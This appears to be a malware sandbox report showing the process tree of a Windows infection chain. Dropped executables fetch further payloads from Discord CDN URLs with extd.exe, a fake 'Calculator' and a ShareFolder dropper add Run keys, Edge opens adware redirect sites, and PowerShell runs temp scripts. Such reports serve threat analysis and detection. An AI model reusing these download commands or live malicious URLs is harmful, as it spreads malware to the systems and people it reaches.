- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\FAD7.bat "C:\Users\Admin\Pictures\Adobe Films\PSrNEL7YgEJZ0xyCqQYVkq2R.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899922141728886806/899922156077596692/11.exe" "11.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899922141728886806/899922177439191050/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\10782\11.exe11.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\10782\Transmissibility.exeTransmissibility.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\RD7xOcy3VQHmAwSgZbhezd8B.exe"C:\Users\Admin\Pictures\Adobe Films\RD7xOcy3VQHmAwSgZbhezd8B.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 2963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\yuXeMxxM0BfMLtDDhBTtQsDP.exe"C:\Users\Admin\Pictures\Adobe Films\yuXeMxxM0BfMLtDDhBTtQsDP.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\uL5L3V3osNAsffBCSX6lDR_a.exe"C:\Users\Admin\Documents\uL5L3V3osNAsffBCSX6lDR_a.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ZGNpAqpmaPDLoM65XACxqexp.exe"C:\Users\Admin\Pictures\Adobe Films\ZGNpAqpmaPDLoM65XACxqexp.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\_52YqC1xoN2nJyiPlEUAxEMy.exe"C:\Users\Admin\Pictures\Adobe Films\_52YqC1xoN2nJyiPlEUAxEMy.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 2925⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\vCb_ITY6AL7dTgGs36nKl_Yo.exe"C:\Users\Admin\Pictures\Adobe Films\vCb_ITY6AL7dTgGs36nKl_Yo.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\m8vJyQQTxNnnbI7OvxWcWqMc.exe"C:\Users\Admin\Pictures\Adobe Films\m8vJyQQTxNnnbI7OvxWcWqMc.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\33BHucR49cevMh8DhI5Gch69.exe"C:\Users\Admin\Pictures\Adobe Films\33BHucR49cevMh8DhI5Gch69.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ffcc883dec0,0x7ffcc883ded0,0x7ffcc883dee07⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ff632ee9e70,0x7ff632ee9e80,0x7ff632ee9e908⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,3070477258772292316,2647162192763611853,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8632_1270196219" --mojo-platform-channel-handle=1788 /prefetch:87⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1724,3070477258772292316,2647162192763611853,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8632_1270196219" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1740 /prefetch:27⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\MgfK7sdY6ayqDIIEjBhcUIUp.exe"C:\Users\Admin\Pictures\Adobe Films\MgfK7sdY6ayqDIIEjBhcUIUp.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\GDP5Gq5p3Y41kH0ygZ5p6eSl.exe"C:\Users\Admin\Pictures\Adobe Films\GDP5Gq5p3Y41kH0ygZ5p6eSl.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-78MSI.tmp\GDP5Gq5p3Y41kH0ygZ5p6eSl.tmp"C:\Users\Admin\AppData\Local\Temp\is-78MSI.tmp\GDP5Gq5p3Y41kH0ygZ5p6eSl.tmp" /SL5="$7021A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GDP5Gq5p3Y41kH0ygZ5p6eSl.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-KLUOL.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-KLUOL.tmp\ShareFolder.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Common Files\YAKWFFCKGL\foldershare.exe"C:\Program Files\Common Files\YAKWFFCKGL\foldershare.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\19-da6f1-f1d-ebc9c-198788a14ea7a\Lahypaekuwe.exe"C:\Users\Admin\AppData\Local\Temp\19-da6f1-f1d-ebc9c-198788a14ea7a\Lahypaekuwe.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5784 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1792 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0xdc,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec47189⤵
-
C:\Users\Admin\AppData\Local\Temp\27-7a456-b3a-2d0aa-9b3e4028e1ecf\Lucajulywe.exe"C:\Users\Admin\AppData\Local\Temp\27-7a456-b3a-2d0aa-9b3e4028e1ecf\Lucajulywe.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0lbibfr1.mhg\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\0lbibfr1.mhg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0lbibfr1.mhg\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exeC:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634371499 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zvxdyisr.xuw\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\zvxdyisr.xuw\any.exeC:\Users\Admin\AppData\Local\Temp\zvxdyisr.xuw\any.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zbuq3tzb.efr\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\zbuq3tzb.efr\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\zbuq3tzb.efr\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7172 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eh53evty.pnl\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\eh53evty.pnl\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\eh53evty.pnl\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"10⤵
-
